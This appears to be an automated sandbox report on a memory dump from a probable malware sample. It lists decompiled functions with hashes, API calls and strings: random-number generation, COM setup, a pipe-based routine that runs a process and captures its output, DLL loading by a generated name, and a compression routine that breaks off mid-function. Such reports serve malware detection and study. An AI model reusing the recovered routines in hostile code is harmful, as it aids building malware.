Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000D16B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000D16B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000d16c1
0x000d16c8
0x000d16d1
0x000d16d5
0x000d1750
0x00000000
0x000d1752
0x000d16e3
0x000d16e5
0x000d16ea
0x00000000
0x00000000
0x000d16f2
0x000d16f4
0x000d16f9
0x00000000
0x00000000
0x000d1703
0x000d1707
0x00000000
0x00000000
0x000d1709
0x000d170e
0x000d1710
0x000d1711
0x000d1715
0x000d171b
0x00000000
0x00000000
0x000d1726
0x000d172f
0x000d1733
0x00000000
0x00000000
0x000d1735
0x000d1737
0x000d173f
0x000d1741
0x000d1742
0x000d174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701

Strings

CryptReleaseContext, xrefs: 000D16FB
advapi32.dll, xrefs: 000D16C3
CryptAcquireContextA, xrefs: 000D16DD
CryptGenRandom, xrefs: 000D16EC

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74

Uniqueness

Uniqueness Score: -1.00%

Function 000D2122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000D2285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000D22CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xd09b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x000d2125
0x000d212a
0x000d212e
0x000d212e
0x000d2133
0x000d2138
0x000d2139
0x000d213c
0x000d213d
0x000d2142
0x000d2145
0x000d2146
0x000d214b
0x000d2152
0x000d21f8
0x000d21f8
0x00000000
0x000d2161
0x000d2161
0x000d2168
0x000d216c
0x000d2173
0x000d217c
0x000d217e
0x000d217e
0x000d217c
0x000d218d
0x000d21b3
0x000d21bc
0x000d21be
0x000d21c4
0x000d21f3
0x000d21f3
0x000d21fb
0x000d21fe
0x000d21fe
0x000d21c6
0x000d21c7
0x000d21cd
0x000d21cf
0x000d21cf
0x000d21d4
0x000d21d3
0x000d21d3
0x000d21db
0x000d21e7
0x000d21f1
0x000d21f1
0x00000000
0x000d219d
0x000d219d
0x000d219d
0x000d21a3
0x00000000
0x00000000
0x000d21a5
0x000d21ab
0x000d21b0
0x00000000
0x000d21b0
0x000d218d

APIs

_snprintf.MSVCRT ref: 000D2146
localeconv.MSVCRT ref: 000D2161
strchr.MSVCRT ref: 000D2173
strchr.MSVCRT ref: 000D2184
strchr.MSVCRT ref: 000D2192
strchr.MSVCRT ref: 000D21B7

Strings

%.*g, xrefs: 000D213D

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0

Uniqueness

Uniqueness Score: -1.00%

Function 000D02B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 000D0332
qsort.MSVCRT ref: 000D05B0

Strings

null, xrefs: 000D02F7
false, xrefs: 000D0315
true, xrefs: 000D0309
%I64d, xrefs: 000D0324

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0

Uniqueness

Uniqueness Score: -1.00%

Function 000CD748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 000CD75C
SysAllocString.OLEAUT32(?), ref: 000CD764
SysAllocString.OLEAUT32(00000000), ref: 000CD778
SysFreeString.OLEAUT32(?), ref: 000CD7F3
SysFreeString.OLEAUT32(?), ref: 000CD7F6
SysFreeString.OLEAUT32(?), ref: 000CD7FB

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000D07F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 000D0865
\u%04X, xrefs: 000D0911
\u%04X\u%04X, xrefs: 000D0950

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1

Uniqueness

Uniqueness Score: -1.00%

Function 000CD523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E000CD523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000C8604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x000cd530
0x000cd533
0x000cd536
0x000cd547
0x000cd54d
0x000cd55e
0x000cd566
0x000cd5b7
0x000cd5b7
0x000cd5bc
0x000cd5c1
0x000cd5c1
0x000cd5c4
0x000cd5c9
0x000cd5ce
0x000cd5ce
0x000cd5d1
0x000cd568
0x000cd569
0x000cd56f
0x000cd580
0x000cd585
0x00000000
0x000cd587
0x000cd594
0x000cd59c
0x00000000
0x000cd59e
0x000cd5a0
0x000cd5a8
0x00000000
0x000cd5aa
0x000cd5ad
0x000cd5b3
0x000cd5b3
0x000cd5a8
0x000cd59c
0x000cd585
0x000cd5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
SysAllocString.OLEAUT32(00000000), ref: 000CD569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
Opcode Fuzzy Hash: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000D21FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000D21FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000D22CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000D2291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xd8250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000D2291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xd8258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000d21ff
0x000d2207
0x000d220c
0x000d220f
0x000d2214
0x000d221a
0x000d2223
0x000d2227
0x000d2227
0x000d2223
0x000d2229
0x000d222e
0x000d2237
0x000d223c
0x000d223f
0x000d2248
0x000d224a
0x000d2251
0x000d2262
0x000d2262
0x000d2264
0x000d226c
0x000d2273
0x00000000
0x000d226e
0x000d2272
0x000d2272
0x000d2253
0x000d2253
0x000d2259
0x000d225b
0x000d2260
0x000d2276
0x000d2279
0x000d227e
0x00000000
0x00000000
0x00000000
0x000d2260

APIs

localeconv.MSVCRT ref: 000D2207
strchr.MSVCRT ref: 000D221A
_errno.MSVCRT ref: 000D2229
strtod.MSVCRT ref: 000D2237
_errno.MSVCRT ref: 000D2264

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 000CA9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000CA9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000C861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000C8604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xde684; // 0x27bf8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xde684; // 0x27bf8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000C91A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E000C9292(_t127);
						E000C861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E000CC379(_t127));
				_t98 =  *0xde68c; // 0x27bfab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E000C9256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000C861A( &_v32, 0);
				return _t128;
			}

0x000ca9c2
0x000ca9c4
0x000ca9d0
0x000ca9d5
0x000ca9d8
0x000ca9da
0x000ca9dd
0x000ca9e0
0x000ca9e7
0x000ca9ea
0x000ca9f1
0x000ca9f4
0x000ca9fe
0x000ca9ff
0x000caa02
0x000caa04
0x000caa05
0x000caa1c
0x000cab9c
0x00000000
0x000cab9c
0x000caa33
0x000cab68
0x000cab6e
0x000cab79
0x000cab7b
0x000cab83
0x000cab83
0x000cab8a
0x000cab8c
0x000cab95
0x000cab95
0x00000000
0x000cab98
0x000caa39
0x000caa3c
0x000caa3f
0x000caa45
0x000caa4f
0x000caa59
0x000caa60
0x000caa69
0x000caa6b
0x000caa71
0x00000000
0x00000000
0x000caa7c
0x000caa83
0x000caa84
0x000caa89
0x000caa8a
0x000caa8b
0x000caa90
0x000caa92
0x000caa93
0x000caa94
0x000caa97
0x000caa9d
0x00000000
0x00000000
0x000caaa3
0x000caaab
0x000caaae
0x000caab6
0x000caab9
0x000caabc
0x000caac2
0x000caad6
0x000caadc
0x000caae2
0x000cab0b
0x000caae4
0x000caae4
0x000caae6
0x000caae8
0x000caaf0
0x000caaf8
0x000caafd
0x000caafd
0x000cab11
0x000cab13
0x000cab13
0x000cab1b
0x000cab23
0x000cab24
0x000cab29
0x000cab32
0x000cab52
0x000cab52
0x000cab5a
0x000cab5d
0x000cab65
0x00000000
0x000cab65
0x000cab3b
0x000cab3f
0x00000000
0x00000000
0x000cab47
0x00000000

APIs

memset.MSVCRT ref: 000CA9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

D, xrefs: 000CAA4F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
Opcode Fuzzy Hash: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65

Uniqueness

Uniqueness Score: -1.00%

Function 000CC4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xde688; // 0xf0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000C95E1(_t50, 0xb62);
					_t66 =  *0xde688; // 0xf0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
					_t20 =  *0xde688; // 0xf0000
					asm("sbb eax, eax");
					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xde688; // 0xf0000
					_t68 = E000C92E5(_t26 + 0x1020);
					_v12 = _t68;
					E000C85D5( &_v8);
					_t32 =  *0xde688; // 0xf0000
					_t34 = E000C92E5(_t32 + 0x122a);
					 *0xde784 = _t34;
					_t35 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xde784);
					 *0xde77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E000CE171(0xdbb48, _t60);
					}
					 *0xde780 = _t38;
					E000C861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xde780 != 0) {
						goto L10;
					} else {
						E000C861A(0xde784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xde780 == 0) {
						_t46 =  *0xde6bc; // 0x27bfa18
						 *0xde780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x000cc4ce
0x000cc4ce
0x000cc4ce
0x000cc4d1
0x000cc4dd
0x000cc4e8
0x000cc504
0x000cc509
0x000cc512
0x000cc514
0x000cc51c
0x000cc53d
0x000cc542
0x000cc54f
0x000cc55a
0x000cc561
0x000cc568
0x000cc579
0x000cc57f
0x000cc582
0x000cc599
0x000cc5a5
0x000cc5ad
0x000cc5b4
0x000cc5ba
0x000cc5c6
0x000cc5cc
0x000cc5d3
0x000cc5e6
0x000cc5d5
0x000cc5d5
0x000cc5d8
0x000cc5de
0x000cc5e3
0x000cc5e8
0x000cc5f3
0x000cc605
0x000cc617
0x00000000
0x000cc619
0x000cc620
0x00000000
0x000cc626
0x000cc627
0x000cc627
0x000cc62e
0x000cc630
0x000cc635
0x000cc635
0x000cc63a
0x000cc63e
0x000cc63e

APIs

LoadLibraryW.KERNEL32 ref: 000CC5C6
memset.MSVCRT ref: 000CC605

Strings

%08x, xrefs: 000CC52F
dll, xrefs: 000CC588

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
Opcode Fuzzy Hash: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734

Uniqueness

Uniqueness Score: -1.00%

Function 000D2D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E000D2D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E000D5D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
